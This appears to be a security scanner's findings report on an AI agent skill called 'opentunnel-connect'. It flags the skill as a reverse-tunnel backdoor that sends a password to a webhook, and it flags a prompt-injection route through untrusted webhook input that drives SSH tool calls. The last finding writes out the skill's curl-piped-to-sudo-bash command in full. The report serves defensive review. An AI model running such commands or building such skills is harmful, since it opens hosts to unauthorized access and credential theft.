opentunnel-connect

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The skill explicitly waits for plaintext credentials (password) from the remote server and instructs the agent to pass that password verbatim into ezssh_ssh_execute / SSH connection commands, forcing the LLM to handle and emit secret values directly.

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Yes — the skill instructs piping a raw .sh from an unknown GitHub repo into sudo bash and uses small/unknown repositories to install privileged reverse-tunnel/SSH tooling, which is a high‑risk pattern (remote code execution, credential exfiltration, and distribution of arbitrary binaries).

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This skill intentionally implements a reverse-tunnel backdoor: it instructs executing a remote curl|bash script with sudo that creates/uses an account, installs binaries, starts a bore reverse tunnel exposing SSH, and POSTs the account password to a webhook—enabling credential exfiltration and unauthorized remote access (and is easily abused via social engineering or supply-chain replacement).

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill starts a webhook (/connect in scripts/server.js) that accepts POSTed JSON credentials from arbitrary remote servers (sent by the fetched scripts/remote.sh or any third party), and those received, untrusted values are directly used to drive SSH connections—so public third‑party content (and scripts fetched from raw.githubusercontent.com) can materially influence tool actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill explicitly fetches and executes remote code at runtime — notably the command curl -fsSL "https://raw.githubusercontent.com/julianponguta/opentunnel/main/skills/opentunnel-connect/scripts/remote.sh" | sudo bash (which runs an external script on the remote host) and the server install step that curls https://github.com/ekzhang/bore/releases/download/v0.6.0/bore-v0.6.0-...tar.gz and extracts/installs it — both are required for operation and execute remote code.